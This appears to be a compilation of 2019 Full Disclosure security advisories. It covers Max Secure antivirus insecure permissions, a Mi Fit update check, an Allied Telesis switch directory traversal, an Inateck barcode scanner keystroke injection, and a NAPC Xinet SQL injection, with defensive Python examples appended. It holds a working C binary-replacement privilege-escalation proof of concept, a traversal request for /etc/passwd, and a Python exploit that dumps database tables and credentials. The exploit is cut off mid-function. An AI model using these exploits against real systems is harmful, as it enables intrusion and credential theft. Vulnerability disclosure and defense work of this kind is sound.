[FD] Max Secure Anti Virus Plus - 19.0.4.020 / CVE-2019-19382 Insecure Permissions
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec

[Vendor]
www.maxpcsecure.com

[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020
File hash: ab1dda23ad3955eb18fdb75f3cbc308a msplusx64.exe

[Vulnerability Type]
Insecure Permissions

[CVE Reference]
CVE-2019-19382

[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory. Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation.

C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F

[Affected Component]
Permissions on installation directory

[Exploit/POC]
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"

/* Max Secure Anti Virus Plus PoC By hyp3rlinx */

BOOL PWNED=FALSE;

/* TRUE if szPath exists and is a regular file (not a directory) */
BOOL FileExists(LPCTSTR szPath){
    DWORD dwAttrib = GetFileAttributes(szPath);
    return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

void main(void){
    /* First run: back up the legitimate EXE, second run: it has already been replaced */
    if(!FileExists(DISABLED_TARGET)){
        CopyFile(TARGET, TMP, FALSE);
        Sleep(1000);
        CopyFile(TMP, DISABLED_TARGET, FALSE);
        printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
        Sleep(1000);
        printf("[+] Disabled MaxSDUI.exe ...\n");
        Sleep(300);
    }else{
        PWNED=TRUE;
    }

    if(!PWNED){
        char fname[MAX_PATH];
        char newLoc[]=TARGET;
        DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
        if (size){
            printf("[+] Copying exploit to vuln dir...\n");
            Sleep(1000);
            CopyFile(fname, TARGET, FALSE);
            printf("[+] Replaced legit Max Secure EXE...\n");
            Sleep(2000);
            printf("[+] Done!\n");
            MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
            Sleep(1000);
            exit(0);
        }
    }else{
        if(FileExists(TMP)){
            remove(TMP);
        }
        printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
        printf("[+] hyp3rlinx\n");
        system("pause");
    }
}

[POC Video URL]
https://www.youtube.com/watch?v=DXSV5geXkTw

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

All content (c). hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
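An added example, not part of the advisory: a small audit in Python that parses `cacls` output in the layout shown above and flags files on which a low-privilege principal holds a write-capable right. It goes beyond the page's single case by also treating the Change (C) and Write (W) rights as enough to replace a file; the sample output is constructed.

```python
import re

# Constructed sample of `cacls *` output in the layout the advisory shows: the first
# ACE shares the line with the file path, further ACEs for that file are indented.
SAMPLE_CACLS = """\
C:\\Program Files\\Max Secure Anti Virus Plus\\7z.dll NT AUTHORITY\\Authenticated Users:(ID)F
                                                   BUILTIN\\Users:(ID)F
                                                   NT AUTHORITY\\SYSTEM:(ID)F
                                                   BUILTIN\\Administrators:(ID)F
C:\\Program Files\\Max Secure Anti Virus Plus\\msplusx64.exe NT AUTHORITY\\SYSTEM:(ID)F
                                                   BUILTIN\\Administrators:(ID)F
                                                   BUILTIN\\Users:(ID)R
"""

# Principals that any local user can act as. Write access for them on a file that
# a privileged component later loads or runs is the condition the advisory describes.
LOW_PRIV_PRINCIPALS = {"BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users", "Everyone"}
WRITE_RIGHTS = {"F", "C", "W"}  # cacls letters: Full, Change, Write

# One ACE at the end of a line: "<principal>:(flag)...<right>", e.g. "BUILTIN\Users:(ID)F".
ACE_RE = re.compile(
    r"(?:^|\s)(?P<who>(?:NT AUTHORITY|BUILTIN|NT SERVICE)\\[A-Za-z0-9 _.-]+|Everyone"
    r"|[A-Za-z0-9_.-]+\\[A-Za-z0-9_.-]+):(?P<flags>(?:\([A-Z]+\))*)(?P<right>[A-Z])\s*$"
)

def parse_cacls(text):
    """Yield (path, principal, right) for every ACE in cacls output."""
    path = None
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue
        head = line[:m.start()].strip()
        if head:                      # this line starts a new file entry
            path = head
        if path is not None:
            yield path, m.group("who"), m.group("right")

def find_weak_files(text):
    """Map each file on which a low-privilege principal holds a write-capable
    right to the offending 'principal:right' entries."""
    weak = {}
    for path, who, right in parse_cacls(text):
        if who in LOW_PRIV_PRINCIPALS and right in WRITE_RIGHTS:
            weak.setdefault(path, []).append(who + ":" + right)
    return weak
```

Run against `cacls /T` output of a product's install directory, every key it returns is a binary an unprivileged user could swap, which is the check the advisory's `cacls` listing performs by eye.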
Re: [FD] Anhui Huami Mi Fit Android Application - Unencrypted Update Check
What's the issue here exactly? An attacker can just prevent the in-app update check from realizing it needs to nag the user? The actual update logic and update-ability is controlled through the Play Store, no?

-Tim Strazzere

On Tue, Nov 26, 2019 at 10:27 AM David Coomber <davidcoomber.info...@gmail.com> wrote:
> Anhui Huami Mi Fit Android Application - Unencrypted Update Check
> --
> https://www.info-sec.ca/advisories/Huami-Mi-Fit.html
>
> Overview
>
> "Mi Fit tracks your activity, analyzes sleep, and evaluates your workouts."
>
> (https://play.google.com/store/apps/details?id=com.xiaomi.hm.health)
>
> Issue
>
> The Anhui Huami Mi Fit Android application (version 4.0.10 and below),
> does not encrypt the connection when it checks for an update.
>
> Impact
>
> An attacker who can monitor network traffic may be able to tamper with
> the application's update function.
>
> Timeline
>
> October 21, 2019 - Attempted to obtain a security contact via an email
> to supp...@amazfit.com
> October 22, 2019 - Provided the details to CERT/CC
> October 23, 2019 - CERT/CC opened a case for tracking
> November 4, 2019 - Attempted to obtain a security contact via an email
> to secur...@xiaomi.com
>
> Solution
>
> Upgrade to version 4.0.11 or later
[FD] CVE-2019-18922; Directory Traversal; Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047]
CVEID: CVE-2019-18922
NAME OF AFFECTED PRODUCT: Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047]
PROBLEM TYPE: Directory Traversal
DESCRIPTION: A Directory Traversal in the Web interface of the Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047] allows unauthenticated attackers to read arbitrary system files via a GET request.
NOTE: This is an End-of-Life product.

I. VULNERABILITY
The Allied Telesis AT-GS950/8 network switch with firmware up to AT-S107 V.1.1.3 [1.00.047] is confirmed to have a directory traversal vulnerability.

II. BACKGROUND
The AT-S107 firmware is used for configuration through a web interface.

III. DESCRIPTION
A GET request for the path http://[IP]/../../../../../../etc/passwd returns the content of that file.

V. BUSINESS IMPACT
An attacker can read arbitrary system files.

VI. SYSTEMS AFFECTED
Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047].

VII. CREDITS
The vulnerability was discovered by the security team at the University of Bayreuth [N. H. Sprenger, Dr. H. Benda].

VIII. LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
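Added example, not from the advisory or the vendor: a defender-side check in Python that resolves request paths under a document root the way a web handler should, rejecting any path that normalizes outside the root (plain or percent-encoded `..`), and a scan over constructed access-log lines that flags such requests. The document root `/web` and the log lines are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

# Hypothetical document root of the switch's web interface (an assumption; the
# advisory does not say where the firmware stores its pages).
WEB_ROOT = "/web"

def resolve_request_path(url_path, web_root=WEB_ROOT):
    """Map a request path onto a file below web_root. Returns None when the
    normalized path would leave the root, which is what the '..' segments in the
    advisory's GET request achieve against a handler that merely concatenates."""
    path = unquote(url_path.split("?", 1)[0])      # drop query string, decode %2e etc.
    candidate = posixpath.normpath(posixpath.join(web_root, path.lstrip("/")))
    if candidate != web_root and not candidate.startswith(web_root + "/"):
        return None
    return candidate

# Constructed access-log lines (common log format) to run the detection over.
SAMPLE_LOG = """\
192.0.2.10 - - [29/Nov/2019:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
192.0.2.11 - - [29/Nov/2019:10:00:02 +0000] "GET /../../../../../../etc/passwd HTTP/1.1" 200 1874
192.0.2.12 - - [29/Nov/2019:10:00:03 +0000] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1874
192.0.2.13 - - [29/Nov/2019:10:00:04 +0000] "GET /css/../index.html HTTP/1.1" 200 512
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) .*"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def find_traversal_requests(log_text):
    """Return (client ip, request path) for each request whose path resolves
    outside the document root; a 200 on such a line means the device served it."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if m and resolve_request_path(m.group("path")) is None:
            hits.append((m.group("ip"), m.group("path")))
    return hits
```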
[FD] [SYSS-2019-027]: Inateck BCST-60 Barcode Scanner - Keystroke Injection Vulnerability (CVE-2019-12503)
Advisory ID: SYSS-2019-027
Product: BCST-60 Barcode Scanner
Manufacturer: Inateck
Affected Version(s): BCST-60
Tested Version(s): BCST-60
Vulnerability Type: Cryptographic Issues (CWE-310)
                    Keystroke Injection Vulnerability
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-05-22
Solution Date: -
Public Disclosure: 2019-11-28
CVE Reference: CVE-2019-12503
Author of Advisory: Matthias Deeg (SySS GmbH)

Overview:

Inateck BCST-60 is a barcode scanner that can be used either wirelessly over 2.4 GHz radio communication or wired via USB.

The manufacturer describes the product as follows [1]:

"With a 2.4G wireless connection, avoid the troubles of Bluetooth pairing. Inateck BCST-60 is a leading product among scanners in the field of large transmission ranges and battery endurance. What's more, it can read barcodes at extreme angles. Whether you need barcode scanning at your retail POS, at a hospital patient's bedside, on the manufacturing production line or your warehouse, the Inateck BCST-60 will be a great fit for your specific needs."

Due to an insecure implementation of the data communication, the wireless barcode scanner Inateck BCST-60 is vulnerable to keystroke injection attacks.

Vulnerability Details:

SySS GmbH found out that the wireless barcode scanner Inateck BCST-60 is vulnerable to keystroke injection attacks.

An attacker can analyze the unencrypted and unauthenticated data packets of the 2.4 GHz radio communication sent by the wireless barcode scanner to the receiver (USB dongle) in order to learn the protocol used. Knowing the data protocol, it is possible to send packets to the USB dongle (receiver) of a target system containing attacker-controlled keystrokes or keystroke sequences.

Proof of Concept (PoC):

SySS GmbH could successfully perform keystroke injection attacks against the wireless barcode scanner Inateck BCST-60 using a developed proof-of-concept software tool in combination with the USB radio dongle Crazyradio PA and the nrf-research-firmware by Marc Newlin [2, 3].

Solution:

SySS GmbH is not aware of a solution for this reported security vulnerability.

Disclosure Timeline:

2019-05-22: Vulnerability reported to manufacturer
2019-11-28: Public release of security advisory

References:

[1] Product website for Inateck BCST-60 barcode scanner
    https://www.inateck.com/bcst-60-2-4ghz-wireless-barcode-scanner-with-35m-range.html
[2] Product website for Crazyradio PA
    https://www.bitcraze.io/crazyradio-pa/
[3] nRF24 research firmware and tools by Marc Newlin
    https://github.com/marcnewlin/presentation-clickers
[4] SySS Security Advisory SYSS-2019-027
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-027.txt
[5] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
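Added example, not code from SySS or Inateck and not the scanner's real protocol: a hypothetical packet format a dongle could require, with a shared pairing key, a truncated HMAC-SHA256 tag and a strictly increasing counter, so that packets forged with another key, modified in transit or replayed from a capture are rejected instead of typed. It covers authentication and replay protection only; confidentiality would need a cipher on top, and the pairing key and barcode value are constructed.

```python
import hashlib
import hmac
import struct

# Constructed pairing key shared by scanner and dongle (hypothetical; the
# reported product has no such secret, which is why anyone who has learned
# the radio protocol can inject keystrokes).
PAIRING_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")
TAG_LEN = 16   # truncated HMAC-SHA256 tag appended to every packet

def build_packet(key, counter, keystrokes):
    """Scanner side: counter (4 bytes, big-endian) || keystrokes || tag over both."""
    body = struct.pack(">I", counter) + keystrokes
    tag = hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]
    return body + tag

class AuthenticatedReceiver:
    """Dongle side: a packet is typed only if its tag verifies under the pairing
    key and its counter is strictly greater than the last accepted counter."""

    def __init__(self, key):
        self.key = key
        self.last_counter = -1
        self.typed = b""          # keystrokes handed on to the host

    def receive(self, packet):
        if len(packet) < 4 + TAG_LEN:
            return False
        body, tag = packet[:-TAG_LEN], packet[-TAG_LEN:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):
            return False          # forged with another key, or modified in transit
        counter = struct.unpack(">I", body[:4])[0]
        if counter <= self.last_counter:
            return False          # replay of a previously captured packet
        self.last_counter = counter
        self.typed += body[4:]
        return True
```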
[FD] NAPC Xinet Elegant 6 Asset Library Web Interface v6.1.655 / Pre-Auth SQL Injection 0Day
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAPC-XINET-ELEGANT-6-ASSET-LIBRARY-WEB-INTERFACE-PRE-AUTH-SQL-INJECTION.txt
[+] ISR: ApparitionSec

[Vendor]
www.napc.com

[Product]
Xinet Elegant 6 Asset Library Web Interface v6.1.655

Web based interface for xinet asset management solution.

[Vulnerability Type]
Pre-Auth SQL Injection

[CVE Reference]
CVE-2019-19245

[Security Issue]
NAPC Xinet (interface) Elegant 6 Asset Library v6.1.655 allows pre-authentication error-based SQL injection via the /elegant6/login LoginForm[username] field when double quotes are used. The vulnerable version seems to be old, but it may still be possible to find it deployed, as I have.

Vulnerable Parameter: LoginForm[username] (POST method).

[Exploit/POC]
import requests,time,re,sys,argparse

#NAPC Xinet Elegant 6 Asset Library v6.1.655
#Pre-Auth SQL Injection 0day Exploit
#By hyp3rlinx
#ApparitionSec
#==
#This will dump tables, usernames and passwords in vulnerable versions
#REQUIRE PARAMS: LoginForm[password]=[rememberMe]=0[username]=SQL
#SQL INJECTION VULN PARAM --> LoginForm[username]
#

IP=""
PORT="80"
URL=""
NUM_INJECTS=20
k=1
j=0
TABLES=False
CREDS=False
SHOW_SQL_ERROR=False

def vuln_ver_chk():
    global IP, PORT
    TARGET = "http://"+IP+":"+PORT+"/elegant6/login"
    response = requests.get(TARGET)
    if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content):
        print "[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655."
        return True
    print "[!] Version not vulnerable :("
    return False

def sql_inject_request(SQL):
    global IP, PORT
    URL = "http://"+IP+":"+PORT+"/elegant6/login"
    tmp=""
    headers = {'User-Agent': 'Mozilla/5.0'}
    payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
    session = requests.Session()
    res = session.post(URL,headers=headers,data=payload)
    idx = res.content.find('CDbCommand')   # Start of SQL Injection Error in response
    idx2 = res.content.find('key 1')       # End of SQL Injection Error in response
    return res.content[idx : idx2+3]

#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
def inc():
    global k,j
    while j < NUM_INJECTS:
        j+=1
        if k !=1:
            k+=1
        return str(j)+','+str(k)

def tidy_up(results):
    global CREDS
    idx = results.find("'")
    if idx != -1:
        idx2 = results.rfind("'")
        if not CREDS:
            return results[idx + 1: idx2 -2]
        else:
            return results[idx + 2: idx2]

def breach(i):
    global k,j,NUM_INJECTS,SHOW_SQL_ERROR
    result=""
    #Dump Usernames & Passwords
    if CREDS:
        if i % 2 == 0:
            target='username'
        else:
            target='password'
        SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))'
             'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -')
        if not SHOW_SQL_ERROR:
            result = tidy_up(sql_inject_request(SQL))
        else:
            result = sql_inject_request(SQL)+"\n"
        print "[+] Dumping "+target+": "+result
    #Dump Tables
    if TABLES:
        while j < NUM_INJECTS:
            nums = inc()
            SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()'
                 'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -')
            if not SHOW_SQL_ERROR:
                result = tidy_up(sql_inject_request(SQL))
            else:
                result = sql_inject_request(SQL) + "\n"
            print "[+] Dumping Table... " +result
            time.sleep(0.3)

def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ip_address", help=".")
    parser.add_argument("-p", "--port", help="Port, Default is 80")
    parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.")
    parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.")
    parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.")
    parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1", help="Display SQL Errors, Default is Clean Dumps.")
    parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show script usage.")
    return parser.parse_args()

def usage():
    print "Dump first ten rows of usernames and passwords"
    print "NAPC-Elegant-6-SQL-Exploit.py -i -c -m 10\n"
    print "\nDump first five rows of database tables and show SQL errors"
    print "NAPC-Elegant-6-SQL-Exploit.py -i -t -m 5 -s\n"
    exit(0)

def main(args):
    global TABLES,CREDS,URL,IP,NUM_INJECTS,SHOW_SQL_ERROR
    if args.ip_address:
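Added example, not the product's code: the defect behind this advisory in Python against an in-memory SQLite table, the string-built login query beside its parameterized form, plus a handler that never echoes database errors (the `CDbCommand` error text the exploit above reads from is exactly such an echo). The advisory triggers the error with a double quote because MySQL accepts it as string syntax; SQLite's string syntax is the single quote, so the example uses that, and the table contents are constructed.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO user (username, password) VALUES ('alice', 'correct horse')")
    return conn

def login_vulnerable(conn, username, password):
    """Query text built from the submitted values: a quote in the username ends
    the literal early and the remainder of the input is parsed as SQL."""
    sql = ("SELECT id FROM user WHERE username='%s' AND password='%s'"
           % (username, password))
    return conn.execute(sql).fetchone()

def login_safe(conn, username, password):
    """Bound parameters: the values travel separately from the statement text,
    so quotes in the input remain data and cannot change the query."""
    sql = "SELECT id FROM user WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()

def probe(login_fn, conn, username, password):
    """Classify a login attempt as 'row', 'none' or 'error'. A database error
    surfacing here is the channel an error-based injection reads from."""
    try:
        return "row" if login_fn(conn, username, password) else "none"
    except sqlite3.Error:
        return "error"

def handle_login(conn, username, password):
    """Hardened handler: parameterized query and a generic failure message, so
    even an unexpected database error never reaches the response body."""
    try:
        row = login_safe(conn, username, password)
    except sqlite3.Error:
        return "login failed"
    return "welcome user %d" % row[0] if row else "login failed"
```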